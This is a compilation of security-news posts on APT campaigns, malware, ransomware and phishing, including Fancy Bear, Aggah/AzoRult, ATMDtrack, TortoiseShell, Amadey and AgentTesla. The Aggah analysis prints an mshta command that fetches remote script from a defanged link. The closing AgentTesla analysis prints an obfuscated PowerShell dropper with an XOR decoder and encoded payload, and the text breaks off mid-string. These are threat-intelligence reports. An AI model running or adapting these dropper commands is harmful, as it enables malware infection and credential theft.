The Fancy Bear APT group has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

“On August 20th, 2019, a new campaign was launched by the group targeting their usual victims – embassies of, and Ministries of Foreign Affairs in, Eastern European and Central Asian countries.” reads the analysis published by ESET.

“As predicted by other fellow researchers, the Sednit group added a new development language in their toolset, more precisely for their downloader: the Nim language. However, their developers were also busy improving their Golang downloader, as well as rewriting their backdoor from Delphi into Golang.”

The threat actors used phishing messages containing a malicious attachment that launches a long chain of downloaders, ending with a backdoor.

Fancy Bear
Figure 1. Chain of compromise overview – Source ESET

The phishing messages come with an attachment document that is blank and references a remote template, wordData.dotm hosted at Dropbox. Once the victim has opened the document in Word it will trigger the download wordData.dotm and incorporate it into the associated document’s working environment, including any active content the template may contain.

“The wordData.dotm file contains malicious macros that then are executed. (Depending on the Microsoft Word version, the VBA macros are disabled by default and user action is required to enable them.) It also contains an embedded ZIP archive that the macros dropped and extracted.” continues the report.

The attacks analyzed by ESET have involved several downloaders written in different languages, including a new one dubbed Nim. Nim is a statically typed compiled systems programming language. It combines successful concepts from mature languages like Python, Ada and Modula.

The downloader written in Nim is quite light in terms of its data-gathering capabilities, compared with previous Golang downloaders.

In August, threat actors also used for the first time a new backdoor written in Golang, the malware has many similarities with the Delphi beckdoors used in previous attacks.  

Experts pointed out that six modules are fetched in the attack chain before the final Golang backdoor. The malware is able to steal sensitive data from the infected machine and take screenshots every 35 seconds during the first few minutes of infection. The backdoor is also able to install additional payloads.

“It seems that the Sednit group is porting the original code to, or reimplementing it in, other languages in the hope of evading detection,” ESET concludes. “It’s probably easier that way and it means they do not need to change their entire TTPs [Tactics, Techniques and Procedures]. The initial compromise vector stays unchanged, but using a service like Dropbox to download a remote template is unusual for the group.”

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post A new Fancy Bear backdoor used to target political targets appeared first on Security Affairs.

Quick Heal reports 29 malicious apps with 10 million+ downloads on Google Play Store

Quick Heal Security Labs reported 29 malicious apps found on Google Play Store, which have a collective download count of more than 10 Millions. Google was quick enough to remove these malicious apps from Play Store immediately. One of the Apps from this set, named “Multiapp multiple accounts simultaneously” has crossed 5 million…

APT or not APT? What’s Behind the Aggah Campaign

Researchers at Yoroi-Cybaze ZLab discovered an interesting drop chain associated with the well-known Aggah campaign.

Introduction

During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and infrastructures, for instance in “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports. 

But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities.

Technical Analysis

Hash7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
ThreatExcel document Dropper
Brief DescriptionFirst stage of Aggah campaign
Ssdeep768:4Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJrqYtAd/fBuzPRtUb:hk3hOdsylKlgxopeiBNhZFGzE+cL2kd3

Table 1. Sample’s information

As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:

mshta.exe http://bit[.ly/8hsshjahassahsh

The bit.ly link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html.This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.

Figure 1. HTA script hidden into Blogspot page
Figure 2. Deobfuscated HTA script

This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.

Figure 3. Another obfuscated Javascript snippet

In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:

  • the creation of a new task called “Windows Update” that triggers every 60 minutes; 
  • the creation of another task called “Update” that triggers every 300 minutes;
  • the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate” registry key;

Each entry contact pastebin.com to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes.

Figure 4. Code used to set persistence

During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin. 

Figure 5. Deobfuscation process
Figure 6. Powershell script used to inject the final payload in legit process

The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage. 

The AzoRult Payload

Hash37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
ThreatAzoRult 
Brief DescriptionAzoRult final payload
Ssdeep3072:tuOSXpMx7ZAlHsbfUkolNGti7lfqeSxM3SpyEY3E/qxg/:Zzx7ZApszolIo7lf/ipT/q

Table 3. Sample’s information

This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data.

Figure 7. AzoRult tries to extract info from browsers files

Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain. 

Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2

Conclusion

We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples.

The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer.

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog

https://blog.yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/

Pierluigi Paganini

(SecurityAffairs – Aggah campaign, hacking)

The post APT or not APT? What’s Behind the Aggah Campaign appeared first on Security Affairs.

Attackers Undeterred in Efforts to Target U.S. Utilities with LookBack

Previous coverage of their tactics, techniques and procedures (TTPs) has failed to deter digital attackers in their efforts to target U.S. utilities with LookBack malware. Between 21 August and 29 August 2019, Proofpoint observed several spear phishing emails targeting U.S. utilities. Those messages appeared to originate from globalenergycertification[.]net, an attacker-controlled domain designed to impersonate the […]… Read More

The post Attackers Undeterred in Efforts to Target U.S. Utilities with LookBack appeared first on The State of Security.

North Korea-linked malware ATMDtrack infected ATMs in India

Kaspersky experts spotted a new piece of ATM malware, dubbed ATMDtrack, that was developed and used by North Korea-linked hackers.

Kaspersky researchers discovered a new piece of ATM malware, tracked as ATMDtrack, that was developed and used by North Korea-linked hackers.

Threat actors deployed the malware on ATM systems to steal payment card details of the back customers.

ATMDtrack has been spotted on the networks of Indian banks since late summer 2018, a more sophisticated version tracked as Dtrack, was involved in attacks aimed at Indian research centers.

“In the late summer of 2018, we discovered ATMDtrack, a piece of banking malware targeting Indian banks. Further analysis showed that the malware was designed to be planted on the victim’s ATMs, where it could read and store the data of cards that were inserted into the machines.” reads the analysis published by Kaspersky.

According to Kaspersky, the most recent attacks involving the malware were observed at the beginning of September 2019.

DTrack, was developed to spy on the victims and exfiltrate data of interest, it supports features normally implemented in remote access trojan (RAT).

Below a list of some functionalities supported by the Dtrack payload executables analyzed by Kaspersky:

  • keylogging,
  • retrieving browser history,
  • gathering host IP addresses, information about available networks and active connections,
  • listing all running processes,
  • listing all files on all available disk volumes.

The experts were able to analyze only dropped samples, as the real payload was encrypted with various droppers. The samples were detected because of the unique sequences shared by ATMDtrack and the Dtrack memory dumps.

“At this point, the design philosophy of the framework becomes a bit unclear. Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly.” continues Kaspersky.

“Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc.”

Once decrypted the final payload, Kaspersky researchers noticed similarities with the Dark Seoul campaign uncovered in 2013 and attributed to the Lazarus APT group. The attackers reused part of their old code in the recent attacks on the financial sector and research centers in India.

“The most obvious function they have in common is the string manipulation function. It checks if there is a CCS_ substring at the beginning of the parameter string, cuts it out and returns a modified one. Otherwise, it uses the first byte as an XOR argument and returns a decrypted string.” states the analysis.

The discovery of the ATMDTrack malware confirms the intense activity of the Lazarus APT group.

The state-sponsored group continues to develop malware that was used in both financially-motivated attacks and cyber espionage operations.

“We first saw early samples of this malware family in 2013, when it hit Seoul. Now, six years later, we see them in India, attacking financial institutions and research centers.” concludes Kaspersky. “And once again, we see that this group uses similar tools to perform both financially-motivated and pure espionage attacks.”

Technical details, including IoCs, are reported in the analysis published by Kaspersky.

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post North Korea-linked malware ATMDtrack infected ATMs in India appeared first on Security Affairs.

Campbell County Memorial Hospital in Wyoming hit by ransomware attack

Campbell County Memorial Hospital in Gilette, Wyoming is facing service disruptions after a ransomware attack hit its computer systems on Friday.

On Friday, the Campbell County Memorial Hospital in Gilette, Wyoming, suffered a ransomware attack that is still causing service disruptions.

“Campbell County Health has been the victim of a ransomware attack. All CCH computer systems have been affected, which impacts the organization’s ability to provide patient care,” reads a statement published by the Campbell County Health.

All updates are available at: www.cchwyo.org/sd. Public Update 9/22/19, 2:30 pm: Campbell County Health continues to…

Gepostet von Campbell County Health am Freitag, 20. September 2019

The ransomware attack is having a dramatic impact con the operations at the hospital, the staff has canceled some surgeries, as well as respiratory therapy and radiology exams and procedures. The hospital has temporarily halted new inpatient admissions.

“Campbell County Health continues to have service disruptions, however, the Emergency Medical Services (EMS), the Emergency Department, Maternal Child (OB) and the Walk-in Clinic are open to assess patients and treat or transfer patients as appropriate.” reads an update published by the hospital. “It is advised to call to confirm your appointment prior to going in. All patients are also asked to bring medication bottles with them to their appointment.”

Immediately after the discovery of the attack, the hospital announced that that the patients presenting to the emergency department and walk-in clinic would be assessed and transferred to an appropriate care facility if needed.

“We are working with regional facilities to transfer patients to if we are not able to provide safe care. The Emergency Department is open and staffed with our expert team of physicians and nursing to assess and evaluate patient care needs,” announced the Campbell County Health.

According to the management at the Campbell County Health hospital, patient and employee data was not accessed in the ransomware attack.

The organization reported the incident to the authorities that still investigating the security breach.

“At this point in time, there is no evidence that any patient data has been accessed or misused. The investigation is ongoing, and we will provide updates when more information becomes available. We are working diligently to restore complete access to our services,” Campbell County Health added.

As on Sunday, the majority of the services at the hospital was restored, however, patients are invited to call in advance to confirm their appointments.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – Campbell County Memorial Hospital, hacking)

The post Campbell County Memorial Hospital in Wyoming hit by ransomware attack appeared first on Security Affairs.

Getting Started With Sysmon

John Strand // In this blog, I want to walk through how we can set up Sysmon to easily get improved logging over what we get from normal (and just plain awful) logging in Windows. Basically, trying to get information from standard Windows logs is a lot like playing tennis against curtains.  Sure, you can […]

The post Getting Started With Sysmon appeared first on Black Hills Information Security.

Growing Cyber Threat Facing the UK Legal Sector

Guest Article by Andy Pearch, Head of IA Services at CORVID

Andy Pearch outlines one of the biggest cyber threats facing the legal sector, and steps that can be taken to save law firms from the devastating consequences.

Cyber crime is a growing concern for all businesses across every industry, and even more so for those who operate in vulnerable sectors, such as law firms. A threat report from the NCSC highlighted that 60% of law firms reported an information security incident in 2018, an increase of 20% from 2017.

Law firms, as with all modern day working practices, are heavily reliant on technology – the sheer amount of expected connectivity makes everyone vulnerable. Research enforces the scale of the problem: in 2017,
60% of law firms reported an incident, but that’s only those who identified an issue. There has also been a significant 42% increase in reported incidents in the last five years. This could mean that either businesses are more aware so are reporting cases, or cyber crime is on the rise. It's most likely a combination of both.

Facing Vulnerabilities
The legal sector is particularly vulnerable to cyber attacks due to the volume of data, sensitive information, financial responsibility and authority it holds. If a law firm specialises in corporate or property law, they are at greater risk, as the potential for financial gain is unprecedented. Although the main reason law firms are targeted is for financial gain, there is also a growth in cyber adversaries seeking political, economic or ideological goals.

Law firms are perceived to be an easy target – particularly smaller firms, as they don’t have the same resources as larger practices, but still hold significant funds. Also, they most likely have a small team managing their entire business infrastructure, with limited IT security resources available. It is often misconstrued that cyber security is the sole responsibility of the IT department, but the reality is that every department is accountable. Cyber security is part of the bigger information risk management picture, and requires emphasis from business leaders.

Not only do law firms and their clients have to consider the financial impact of a cyber attack, but reputational damage for their practice can be irreversible. Therefore, to ensure law firms are protected, they need to be aware of the consequences of a phishing attack.

Acknowledging Threats

Email is the main route in for cyber criminals. Phishing attacks can take the form of impersonation, intercepted emails and/or malicious attachments. The aim of threat actors responsible for these attacks is to coerce users into making a mistake, such as disclosing sensitive information, providing users’ credentials or downloading malware.

Unfortunately, not a single law firm – or any organisation, for that matter – is exempt from being the next victim of a cyber attack. Law firms need to take action and be prepared. When it comes to mitigating email compromise, law firms cannot expect employees to bear the burden of identifying threats, but instead must utilise the technology available to spot incoming threats as they arise.

The use of multiple detection engines and threat intelligence sources transforms email security and threat protection. Real-time fraud detection and content checking automatically highlight phishing and social engineering techniques, removing the burden from users and bringing a level of sophistication to current cyber strategies that is needed to keep today’s threats at bay. By automatically flagging potentially concerning emails – such as those attempting to mislead, harvest credentials or spread malicious elements – individuals can make fast, informed and confident decisions regarding their legitimacy.

Without doubt, impersonation attacks, payment diversion fraud and business email compromise attacks are on the rise, but there are robust solutions in place to mitigate the associated risks. There is no need for – and indeed no excuse for – passing the buck to the user community. There is an abundance of resources available to help law firms adopt a proactive cyber security mindset – notably, the
threat report from the NCSC raises awareness and highlights specific safeguards that can be put in place.

It is time for the legal sector to take cyber security seriously. Failing to do so will only lead to devastating repercussions in the not-so-distant future. For a sector that is so protective of its reputation, every precaution should be put in place to keep it safe.

TortoiseShell Group targets IT Providers in supply chain attacks

Symantec spotted a new threat actor, tracked as TortoiseShell, that is compromising IT providers to target their specific customers.

Symantec researchers spotted a new threat group, tracked as TortoiseShell, that is compromising IT providers to target their specific customers. The group was first spotted in 2018, but experts speculate that it has been active for a longer time.

Symantec has identified a total of 11 organizations hit by the threat actor, most of them are based in Saudi Arabia, for two of them, the attackers gained domain admin-level access.

“A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers.” reads the analysis published by Symantec.

In two attacks carried out by the TortoiseShell group, the threat actor infected hundreds of hosts, this is an anomalous behavior that suggests it was searching for specific machines of interest.

https://twitter.com/threatintel/status/1174427878089351168

The group used both custom malware and off-the-shelf hacking tools for its campaigns, such as the Syskit custom backdoor that was discovered on August 21.

The Syskit is simple backdoor that can download and execute additional payloads and commands, it was written in both Delphi and .NET.

The malicious code collects machine’s info (i.e. IP address, operating system name and version, and Mac address) and sends them to the C&C is Base64 encoding. The malware supports several commands, such as download other malware and launch PowerShell to unzip a file or run commands in the Command Prompt console.

The group was observed using other publicly available tools, including:

    • Infostealer/Sha.exe/Sha432.exe
    • Infostealer/stereoversioncontrol.exe
    • get-logon-history.ps1

The two info-grabbing malware can collect details about the machine they landed on and “Firefox data of all users of the machine.”

Infostealer/stereoversioncontrol.exe downloads a RAR file, as well as the get-logon-history.ps1 tool. It runs several commands on the infected machine to gather information about it and also the Firefox data of all users of the machine. It then compresses this information before transferring it to a remote directory. Infostealer/Sha.exe/Sha432.exe operates in a similar manner, gathering information about the infected machine.” continues the report.

“We also saw Tortoiseshell using other dumping tools and PowerShell backdoors.”

Experts pointed out that the initial infection vector used by Tortoiseshell group to infect machine is not clear, but they speculate that attackers use to compromise web servers to gain access to the target network. In one case, the first indication of malware on the victim’s network was a web shell likely used to hack into the webserver.

“On at least two victim networks, Tortoiseshell deployed its information gathering tools to the Netlogon folder on a domain controller. This results in the information gathering tools being executed automatically when a client computer logs into the domain.” continues Symantec.

In one of the targeted organizations, Symantec experts observed the presence of Poison Frog, a PowerShell-based backdoor associated in the past with operations carried out by the Iran-linked OilRig APT group (a.k.a. APT34, HelixKitten).

However, the presence of Poison Frog is not sufficient to attribute the attacks to OilRIG because the source code of the backdoor was publicly released on April 2019, before the victim had been compromised.

“The targeting of IT providers points strongly to these attacks being supply chain attacks, with the likely end goal being to gain access to the networks of some of the IT providers’ customers.” concludes Symantec.

“This provides access to the victims’ networks without having to compromise the networks themselves, which might not be possible if the intended victims have strong security infrastructure, and also reduces the risk of the attack being discovered.”

Pierluigi Paganini

(SecurityAffairs – APT, Tortoiseshell)

The post TortoiseShell Group targets IT Providers in supply chain attacks appeared first on Security Affairs.

Security Affairs newsletter Round 232

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

A bug in Instagram exposed user accounts and phone numbers
Delaler Leads, a car dealer marketing firm exposed 198 Million records online
Drone attacks hit two Saudi Arabia Aramco oil plants
A flaw in LastPass password manager leaks credentials from previous site
Astaroth Trojan leverages Facebook and YouTube to avoid detection
Data leak exposes sensitive data of all Ecuador ‘citizens
France and Germany will block Facebooks Libra cryptocurrency
MobiHok RAT, a new Android malware based on old SpyNote RAT
Tor Projects Bug Smash Fund raises $86K in August
Australia is confident that China was behind attack on parliament, political parties
Backup files for Lion Air and parent airlines exposed and exchanged on forums
Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors
Experts warn of the exposure of thousands of Google Calendars online
Fraudulent purchases of digitals certificates through executive impersonation
Memory corruption flaw in AMD Radeon driver allows VM escape
More than 737 million medical radiological images found on open PACS servers
Skidmap Linux miner leverages kernel-mode rootkits to evade detection
United States government files civil lawsuit against Edward Snowden
At least 1,300 Harbor cloud registry installs open to attack
Emotet is back, it spreads reusing stolen email content
Smominru Botnet continues to rapidly spread worldwide
Commodity Malware Reborn: The AgentTesla Total Oil themed Campaign
Crooks hacked other celebrity Instagram accounts to push scams
Magecart attackers target mobile users of hotel chain booking websites
Two selfie Android adware apps with 1.5M+ downloads removed from Play Store
U.S. taxpayers hit by a phishing campaign delivering the Amadey bot
5 Cybersecurity Trends in the Professional Services Sector
Iran denies successful cyber attacks hit infrastructures of its oil sector
MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019)
One of the hackers behind EtherDelta hack also involved in TalkTalk hack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 232 appeared first on Security Affairs.

MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019)

Hello, it’s unixfreaxjp here. It has been a while since I wrote our own blog, and it is good to be back. Thank you for your patience for all of this time.

The background

It was after September 2016 when we decided to move our blog and since then I had a lot of fun in learning and experimenting much with “Jekyll” (based on “Poole”) and “BlackDoc”, and I just convert all posts statically into “Markdown” and all syntax highlighter into “Rouge” highlighter with templates coded in “Liquid”, and I was seriously dealing with coding in Ruby on FreeBSD for it. Wasn’t easy, but with help from the team, we did that, and I learned a lot.

Then on posting my research I moved along to try out several platforms, it’s good to actually know that we don’t have to depend only into a platform, and 3 (three) years out there was making us learning a lot about other reliable services in here and there. What me and the mates have learned is, in using any media services, either it’s your own or other’s party ones, they all are having their pro’s and con’s points. And frankly speaking, you won’t know for sure about each one of those con’s unless you go out there and try them yourself.

So, here we are, back to service where we first started to do MalwareMustDie blog. And I found that this environment is nicer than before, thank you Google for doing the hard work in satisfying and securing bloggers. So I just set it up and switched all access to HTTPS and hopefully the dead-links effect are minimum. For those who had problem with broken RSS this effort may be a good news to you. You can still access the MMD (MalwareMustDie) blog under sub-domain of “blog2” with HTTP but I won’t add more posts on those servers and I will minimize its service.

The bad side of all of these adventure is, now I have my research materials scattering around all over the internet during these past three years (smile). Oh yes, the research and its activity is still active as usual, yet now we’re happy that we don’t need to make much voice anymore, the security awareness are blooming..not like we had before in 2012, I am still hanging out with our friends and we’re still on to dissecting malware.. Linux or not.. Intel CPU ones or not, and to be noted: I am still a great fan of radare2 and FreeBSD!

I think some followers may not know what we’ve been doing all of these three years, or maybe they can’t track well our activities on our security research, so I decided to list some links for you to catch up with. Some of those reports are just screenshots with comments (security related pictures really paint thousand words), some are just posts in reddit or others, but all contains important information.
Does this means I am posting analysis blog again? Well, you’re going to find that out too 🙂

Here’s the list of what’s been done during these three years, enjoy:

1. Windows related malware posts

Raccoon stealer infection in the wild

Dissecting on memory post exploitation powershell beacon w/ radare2

Intel POPSS Vulnerability PoC Reversed

Win32/TelegramSpyBot

Win32/WaRAT

Win32/Bayrob

“FHAPPI attack” : FreeHosting APT PowerSploit Poison Ivy

2. Linux related malware posts

Honda Car’s Panel’s Rootkit from China

Linux/SystemTen

Linux/Httpsd

Linux/SS(Shark)

Linux/DDoSTF today

GoARM.Bot + static strip ARM ELF by ChinaZ

Linux/ChinaZ Edition 2

Linux/CarpeDiem

Linux/Haiduc (bruter/memo)

Linux/Vulcan

Linux/HelloBot

Linux/Cayosin

Linux/DDoSMan

Linux/Mirai-Miori

Linux/Mandibule (Process Injector)

So Many Mirai..Mirai on the wall)

Today’s Kaiten and PerlDDoS

Linux/STD bot

Linux/Kaiten (modded ver) in Google clouds

Linux/Qbot or GafGyt ..in Kansas city?

ChinaZ gang is back to shellshock drops Elknot abuses USA networks

3. Mac OSX related malware posts

OSX/MugTheSec

OSX/MachO-PUP (a quickie)

4. Other malware reports

Webshell/r57shell, and..

I also posted either in VirusTotal comments, or previously posted some on kernelmode(not anymore), or sometimes making several posts or notes in reddit.

5. My talks on security conference

About my presentation of: “Unpacking the non-unpackable” (ELF packers talk) in R2CON2018

Epilogue

I may edit/change my posts to adjust or brush up their contents along with this post on transitioning the services, so there will be addition or changes.

Please stay safe, don’t code/use bad stuff, and enjoy the summary!

#MalwareMustDie!

Original Post: https://blog.malwaremustdie.org/2019/09/mmd-0063-2019-summarize-report-of-three.html

Pierluigi Paganini

(SecurityAffairs – MalwareMustDie, malware)

The post MMD-0063-2019 – Summarize report of three years MalwareMustDie research (Sept 2016-Sept 2019) appeared first on Security Affairs.

Two selfie Android adware apps with 1.5M+ downloads removed from Play Store

Experts at Wandera’s threat research team discovered two adware apps on the Google Play Store that were downloaded 1.5M+ times.

Researchers at Wandera discovered two adware selfie filter camera apps on the Google Play that were pushing ads and that can record audio. The bad news is that the two apps were downloaded 1.5M+ times.

The two apps are Sun Pro Beauty Camera (1M+ installs) and Funny Sweet Beauty Selfie Camera (500K installs).

adware SunPro Funny Sweet apps

The researchers discovered that both APKs are packed with a Chinese packer, Ijiami, to prevent their analysis.

The adware pushed by the two malicious app covered the entire display of the Android device. The analysis of the two apps revealed that they required additional permissions such as access to the camera.

The two apps request RECORD_AUDIO permission that allows the app to record audio with the microphone at any moment without the user’s confirmation.

Both apps request the SYSTEM_ALERT_WINDOW permission that allows the app to overlay some information and trick the user into clicking something he did not want or typing sensitive data.

Once the apps are launched, they created a shortcut and then removed itself from the app drawer. This trick attempt to ensure persistence, even after uninstalling the shortcut, the app remains active and runs g in the background.

One of the main differences between the two apps is that SunPro Beauty Camera did not even need to be launched to push the ads, while the Funny Sweet Beauty Camera starts displaying the ads only when the app is used to download filtered photos on the device.

The experts reported the apps to Google on September 11 and the tech giant immediately removed them from Google Play.

Below recommendations published by the experts:

  • Check your app inventory for installations of these apps (Wandera customers can see this in the Security Threat View where the apps will be flagged as adware)
  • Remove instances of the apps if they have been installed
  • Always vet the security of apps, even if they are downloaded from official stores (Wandera customers can do this using App Insights)

Pierluigi Paganini

(SecurityAffairs – Android, Adware)

The post Two selfie Android adware apps with 1.5M+ downloads removed from Play Store appeared first on Security Affairs.

U.S. taxpayers hit by a phishing campaign delivering the Amadey bot

Cofense researchers spotted a phishing campaign that is targeting taxpayers in the United States to infect them with the Amadey malware.

Security experts at Cofense uncovered a phishing campaign that is targeting taxpayers in the United States attempting to infect them with a new piece of malware named Amadey.

The Amadey bot is a quite simple piece of malware that is available for hire for cybercriminals. Experts revealed that the botnet was used by the TA505 cybercrime gang to distribute the FlawedAmmy RAT and some email stealers.

“The Cofense Phishing Defense CenterTM  has detected a new wave of attacks targeting the US taxpayer by delivering Amadey botnet via phishing emails.” reads the analysis published by Cofense. “Amadey is a relatively new botnet, first noted late in Q1 of 2019. Known for its simplicity, it is available to hire for a very steep price compared to other commercially available botnets with similar functionality.”

The phishing messages used in this campaign purport to be from the Internal Revenue Service (IRS), they claim that the recipient is eligible for a tax refund.

Amadey IRS phishing

In classic social engineering attack, the phishing message presents a “one time username and password” to the victims and urges the user to click the “Login Right Here” button.

The login button is an embedded Hyperlink that points to hxxp://yosemitemanagement[.]com/fonts/page5/, a page designed to display a fake IRS login page.

Once provided the login credentials, the user will be informed of a pending refund and will be asked to download a document, print and sign it. The signed document has to be sent or uploaded to the portal. Experts discovered that when the user attempts to download the document, he will download a ZIP file that contains a highly obfuscated script dropper written in Visual Basic.

The VBScript drops an executable that downloads and executes another executable. To Amadey malware achieves persistence by setting up a registry entry using the Reg.exe command-line tool.

Once the installation process is concluded, the Amedey bot connects to one of the command and control (C&C) servers via HTTP on port 80 and sends it system diagnostic information, then it waits for further instructions.

The Amedey malware sends back to the server several data, including a unique identifier of the infected system, the malware version, operating system, antivirus software, system name, and username.

The analysis published by Cofense includes the Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post U.S. taxpayers hit by a phishing campaign delivering the Amadey bot appeared first on Security Affairs.

Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Agent Tesla is a fully customizable password info-stealer offered as malware-as-a-service, many cyber criminals are choosing it as their preferred recognition tool.  

Introduction

Nowadays the Malware-As-A-Service is one of the criminal favorite ways to breach security perimeter. Agent Tesla is one of these “commodity malware”. It is a fully customizable password info-stealer and many cyber criminals are choosing it as their preferred recognition tool.  

During our monitoring operations we discovered an infection-chain designed to deliver this kind of malware to some Italian companies. The attack has been carried out impersonating personnel from the Liberian division of a global Oil Corporate. The malicious email message were spoofed, but the reference to the employee was realistic and suggests he may have conducted some preliminary OSINT.

Technical Analysis

Hash72087f6eda897bd3deb31fa85cfbeda8eae4bad0d51a123f3e99ae8fb604a8c0
ThreatMacro Dropper
Brief DescriptionAgent Tesla Doc Macro Dropper
Ssdeep768:nI5p+fXDk6n/lj9uJUWbnyAik8Y61g187083VCP9V9eakw6L8:8p+fzP/bgfix28ly9VZH6L8

Table 1. Static information about the doc macro

The document uses a common phishing schema, it invites the user to enable the macro execution due to compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document
Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacement the document spawns another Powershell script.

  1. powershell -WindowStyle Hidden
  2. function b72f3 { param($l74b5) $l557ad = ‘bc9b4’;$l63acc = ”; for ($i = 0; $i -lt $l74b5.length; $i+=2) { $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16); $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]); } return $l63acc;}
  3. $k61b35e = ‘1710500c534230401140070e0217470b0d5e42671b104d07594c314c0c400b0e5c4c7d0c175c105b12305c10420b005c110f1710500c534230401140070e17265d0304570d47160a5a110f1710500c534230401140070e172b7b59164a0b5a05436a1b471606544c7a0717026f3e12165b0e5d01435a0e55111019120d5b020a045619387d0e582b0e490d46164b1b0951100d5c0e07504115275a161140325b0b0d4d5f1625064d32460d0078065010064a11164b3e191241000f500114111758165d01435c1a40071157427d0c1769164642155856020354112b5a16334d101403050d55000056151140100a57051403510d57034b586226580e2a54125b101711405f071157075851511b4e14270d4d104d320c500c40425e1940780d025d2e5d001158104d404a6442441701550b5742104d03400b0019074c16064b0c142b0d4d324010434c06055656084a471611500c5342090d0600005610596f260f552b59120c4b161c40085c105a070f0a50164e437c0c40101a690d5d0c170440620b114d17550e334b0d4007004d401d3f434917560e0a5a424716024d0b574206411651100d19005b0d0f190f0d5b5b0b010c4a2a571664161119115204050157004e36700c4032174b425e57510a54554e434c0b5a16434b5606550215425b171719175d0c17190f0c035a0d4b0f3927550e7d0f135610404a417207460c065551064c07550e164e437c0c40101a690d5d0c17044066160f740d42072e5c0f5b101a1b4e1431064d2e5511177c10460d110404550e105c4b6942104d03400b0019074c16064b0c14140c50061408005f0006504b700c4032174b425904525b5a182b0d4d324010435d015506520c4e5d0c1719090057555b4b0f12165b0e5d01434a1655160a5a425d0c17190d0c53050f551c4b18700c4032174b425107050b57034